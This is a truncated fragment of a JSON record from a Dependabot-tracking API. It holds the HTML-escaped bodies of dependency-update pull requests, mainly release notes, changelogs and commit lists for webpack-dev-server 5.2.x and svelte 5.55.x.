\u003ccode\u003eOrigin\u003c/code\u003e header are not allowed to connect to WebSocket server unless configured by \u003ccode\u003eallowedHosts\u003c/code\u003e or it different from the \u003ccode\u003eHost\u003c/code\u003e header\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThe above changes may make the dev server not work if you relied on such behavior, but unfortunately they carry security risks, so they were considered as fixes.\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eprevent overlay for errors caught by React error boundaries (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5431\"\u003e#5431\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/8c1abc903ab444d9ce99e567b9a6c603e1ec06be\"\u003e8c1abc9\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003etake the first network found instead of the last one, this restores the same behavior as 5.0.4 (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5411\"\u003e#5411\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ffd0b86b790d372f90e17aea92cfd9def83fee96\"\u003effd0b86\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.0\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.1.0...v5.2.0\"\u003e5.2.0\u003c/a\u003e (2024-12-11)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/blob/main/CHANGELOG.md\"\u003ewebpack-dev-server's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.1...v5.2.2\"\u003e5.2.2\u003c/a\u003e (2025-06-03)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u0026quot;Overlay enabled\u0026quot; false positive (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/18e72ee3e57a6e7598a6c068c0ff7c7bb6a857f1\"\u003e18e72ee\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edo not crush when error is null for runtime errors (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5447\"\u003e#5447\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/309991f947baa0354140b9930a9654ac792e20c4\"\u003e309991f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove unnecessary header \u003ccode\u003eX_TEST\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5451\"\u003e#5451\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/64a6124bf1b4d158bb42a4341dd03121ae3759fa\"\u003e64a6124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erespect the \u003ccode\u003eallowedHosts\u003c/code\u003e option for cross-origin header check (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5510\"\u003e#5510\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/03d12141bf7be09dfb14e91e5c834ee63bd9a9a2\"\u003e03d1214\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.0...v6.0.0\"\u003e5.2.1\u003c/a\u003e (2025-03-26)\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ecross-origin requests are not allowed unless allowed by \u003ccode\u003eAccess-Control-Allow-Origin\u003c/code\u003e header\u003c/li\u003e\n\u003cli\u003erequests with an IP addresses in the \u003ccode\u003eOrigin\u003c/code\u003e header are not allowed to connect to WebSocket server unless configured by \u003ccode\u003eallowedHosts\u003c/code\u003e or it different from the \u003ccode\u003eHost\u003c/code\u003e header\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThe above changes may make the dev server not work if you relied on such behavior, but unfortunately they carry security risks, so they were considered as fixes.\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eprevent overlay for errors caught by React error boundaries (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5431\"\u003e#5431\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/8c1abc903ab444d9ce99e567b9a6c603e1ec06be\"\u003e8c1abc9\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003etake the first network found instead of the last one, this restores the same behavior as 5.0.4 (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5411\"\u003e#5411\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ffd0b86b790d372f90e17aea92cfd9def83fee96\"\u003effd0b86\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.1.0...v5.2.0\"\u003e5.2.0\u003c/a\u003e (2024-12-11)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadded \u003ccode\u003egetClientEntry\u003c/code\u003e and \u003ccode\u003egetClientHotEntry\u003c/code\u003e methods to get clients entries (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/dc642a832d45c23c5c7a08fbf29995e0db7e0d95\"\u003edc642a8\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/fd401308f1cc026262880e2dab810004d6444282\"\u003e\u003ccode\u003efd40130\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ece4f3617bea31fb6d3833f69a32b6c289959a49\"\u003e\u003ccode\u003eece4f36\u003c/code\u003e\u003c/a\u003e chore: update deps (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5661\"\u003e#5661\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/a2161442a314a06a97e25d1404d08410cb4e9c51\"\u003e\u003ccode\u003ea216144\u003c/code\u003e\u003c/a\u003e ci: fix test (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5658\"\u003e#5658\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/df073c53a8cefb54210b43813fa6ee60364a554e\"\u003e\u003ccode\u003edf073c5\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/b550a702bd4246d1724513b70de0bfbe6604672f\"\u003e\u003ccode\u003eb550a70\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/9704dc52e3f696ae1446428c25882745e9b65cbb\"\u003e\u003ccode\u003e9704dc5\u003c/code\u003e\u003c/a\u003e chore: upgrade selfsigned to v5 and remove node-forge dependency (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5618\"\u003e#5618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/92bf644784741e8ea5adaa4a1dc26f4d462f223d\"\u003e\u003ccode\u003e92bf644\u003c/code\u003e\u003c/a\u003e chore: bump express to update qs (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5621\"\u003e#5621\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/792b2f0bd13a3b93abf701fe3a5cf41ee16722f4\"\u003e\u003ccode\u003e792b2f0\u003c/code\u003e\u003c/a\u003e chore(deps-dev): bump the dependencies group with 4 updates (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5606\"\u003e#5606\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/6d587cab3e023675de2feedf81bcdfcec7d5b774\"\u003e\u003ccode\u003e6d587ca\u003c/code\u003e\u003c/a\u003e chore(deps): bump the dependencies group across 1 directory with 27 updates (...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003e\u003ccode\u003ef91baa8\u003c/code\u003e\u003c/a\u003e fix(overlay): add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v4.15.2...v5.2.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version modifies \u003ccode\u003eprepare\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `svelte` from 4.2.20 to 5.55.10\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/sveltejs/svelte/releases\"\u003esvelte's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003esvelte@5.55.10\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: unlink errored and otherwise finished batch (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18264\"\u003e#18264\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eperf: walk composedPath() directly in delegated event propagation (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18268\"\u003e#18268\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: transfer effects when merging batches (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18254\"\u003e#18254\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: allow \u003ccode\u003e$derived(await ...)\u003c/code\u003e in disconnected effect roots (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18273\"\u003e#18273\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: remove temporary raw-text hydration markers (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18269\"\u003e#18269\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: propagate async \u003ccode\u003e@const\u003c/code\u003e blockers through closure references so template expressions like \u003ccode\u003e{(() =\u0026gt; host)()}\u003c/code\u003e correctly wait for the awaited value (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18309\"\u003e#18309\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: properly unlink batches (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18298\"\u003e#18298\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: settle discarded batch (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18290\"\u003e#18290\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: declare \u003ccode\u003elet:\u003c/code\u003e directives before \u003ccode\u003e{@const}\u003c/code\u003e declarations on slotted elements (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18271\"\u003e#18271\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: resume outro-ed branches if they were kept around (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18291\"\u003e#18291\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: avoid waterfall-warning when async resolves to same value (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18297\"\u003e#18297\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: correctly coordinate component-level effects inside async blocks (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18260\"\u003e#18260\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: make unnecessary commit work less likely (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18263\"\u003e#18263\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003echore: add tag name to \u003ccode\u003ea11y_click_events_have_key_events\u003c/code\u003e warning (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18272\"\u003e#18272\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: catch rejected promises while merging/committing (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18266\"\u003e#18266\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esvelte@5.55.9\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: don't unset batch when calling \u003ccode\u003e{#await ...}\u003c/code\u003e promise (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18243\"\u003e#18243\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: promise-ify \u003ccode\u003e{#await await ...}\u003c/code\u003e expressions on the server and correctly hydrate them on the client (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18243\"\u003e#18243\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: deduplicate dependencies that are added outside the init/update cycle (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18243\"\u003e#18243\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: avoid false-positive batch invariant error (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18246\"\u003e#18246\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: inline primitive constants in attribute values during SSR (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18232\"\u003e#18232\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esvelte@5.55.8\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efix(print): handle \u003ccode\u003esvelte:body\u003c/code\u003e and fix keyframe percentage double-printing (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18234\"\u003e#18234\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/sveltejs/svelte/blob/main/packages/svelte/CHANGELOG.md\"\u003esvelte's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e5.55.10\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: unlink errored and otherwise finished batch (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18264\"\u003e#18264\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eperf: walk composedPath() directly in delegated event propagation (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18268\"\u003e#18268\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: transfer effects when merging batches (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18254\"\u003e#18254\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: allow \u003ccode\u003e$derived(await ...)\u003c/code\u003e in disconnected effect roots (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18273\"\u003e#18273\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: remove temporary raw-text hydration markers (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18269\"\u003e#18269\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: propagate async \u003ccode\u003e@const\u003c/code\u003e blockers through closure references so template expressions like \u003ccode\u003e{(() =\u0026gt; host)()}\u003c/code\u003e correctly wait for the awaited value (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18309\"\u003e#18309\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: properly unlink batches (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18298\"\u003e#18298\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: settle discarded batch (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18290\"\u003e#18290\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: declare \u003ccode\u003elet:\u003c/code\u003e directives before \u003ccode\u003e{@const}\u003c/code\u003e declarations on slotted elements (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18271\"\u003e#18271\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: resume outro-ed branches if they were kept around (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18291\"\u003e#18291\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: avoid waterfall-warning when async resolves to same value (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18297\"\u003e#18297\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: correctly coordinate component-level effects inside async blocks (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18260\"\u003e#18260\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: make unnecessary commit work less likely (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18263\"\u003e#18263\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003echore: add tag name to \u003ccode\u003ea11y_click_events_have_key_events\u003c/code\u003e warning (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18272\"\u003e#18272\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: catch rejected promises while merging/committing (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18266\"\u003e#18266\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.55.9\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: don't unset batch when calling \u003ccode\u003e{#await ...}\u003c/code\u003e promise (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18243\"\u003e#18243\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: promise-ify \u003ccode\u003e{#await await ...}\u003c/code\u003e expressions on the server and correctly hydrate them on the client (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18243\"\u003e#18243\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: deduplicate dependencies that are added outside the init/update cycle (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18243\"\u003e#18243\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: avoid false-positive batch invariant error (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18246\"\u003e#18246\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: inline primitive constants in attribute values during SSR (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18232\"\u003e#18232\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.55.8\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/0bb715d3cfe51134756e79b6193dacccfa77361f\"\u003e\u003ccode\u003e0bb715d\u003c/code\u003e\u003c/a\u003e Version Packages (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18255\"\u003e#18255\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/49538608356eabc74fc182b03449112a4fa1f12d\"\u003e\u003ccode\u003e4953860\u003c/code\u003e\u003c/a\u003e chore: remove unused class property (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18307\"\u003e#18307\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/638ab370a561f97552229589f2f334655426fe5c\"\u003e\u003ccode\u003e638ab37\u003c/code\u003e\u003c/a\u003e fix: prevent batch unlinking twice (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18303\"\u003e#18303\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/0da9f9e2ab515da16d624c5bc48b554beb179f92\"\u003e\u003ccode\u003e0da9f9e\u003c/code\u003e\u003c/a\u003e fix: disallow effect creation after \u003ccode\u003eawait\u003c/code\u003e (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18299\"\u003e#18299\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/d4be4e297365030b5cbcb676bda133f2840816b2\"\u003e\u003ccode\u003ed4be4e2\u003c/code\u003e\u003c/a\u003e chore: ensure treeshaking test runs during CI (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18302\"\u003e#18302\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/e705369dee060e74ad9456e45824f36b1ee3c6cf\"\u003e\u003ccode\u003ee705369\u003c/code\u003e\u003c/a\u003e fix: propagate async \u003ca href=\"https://github.com/const\"\u003e\u003ccode\u003e@​const\u003c/code\u003e\u003c/a\u003e blockers through closure references (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18309\"\u003e#18309\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/ec08dbc7ee156d34816586feb49bb8650579e41f\"\u003e\u003ccode\u003eec08dbc\u003c/code\u003e\u003c/a\u003e fix: only unlink batch if we're done with it (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18298\"\u003e#18298\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/b40c359d44196b7b87745259243333763ed61ec5\"\u003e\u003ccode\u003eb40c359\u003c/code\u003e\u003c/a\u003e fix: don't assume boundary exists during increment/decrement (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18289\"\u003e#18289\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/c01e598fff2a851323fb61c6325ef51b87f019fd\"\u003e\u003ccode\u003ec01e598\u003c/code\u003e\u003c/a\u003e fix: avoid waterfall-warning when async resolves to same value (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18297\"\u003e#18297\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/070a0c4f7708ae0caa209ff762d98c0f117e6adb\"\u003e\u003ccode\u003e070a0c4\u003c/code\u003e\u003c/a\u003e Revert \u0026quot;perf: use Set instead of Array for constant lookups in...\n\n_Description has been truncated_","html_url":"https://github.com/dporkka/platform/pull/31","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/dporkka%2Fplatform/issues/31","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/31/packages"}},{"old_version":"5.2.2","new_version":"5.2.4","update_type":"patch","path":null,"pr_created_at":"2026-05-28T23:15:16.000Z","version_change":"5.2.2 → 5.2.4","issue":{"uuid":"4544459458","node_id":"PR_kwDOMmpB9c7gcHFl","number":238,"state":"open","title":"build(deps): bump the npm_and_yarn group across 1 directory with 6 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":3,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-05-28T23:15:16.000Z","updated_at":"2026-05-28T23:16:29.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"build(deps): 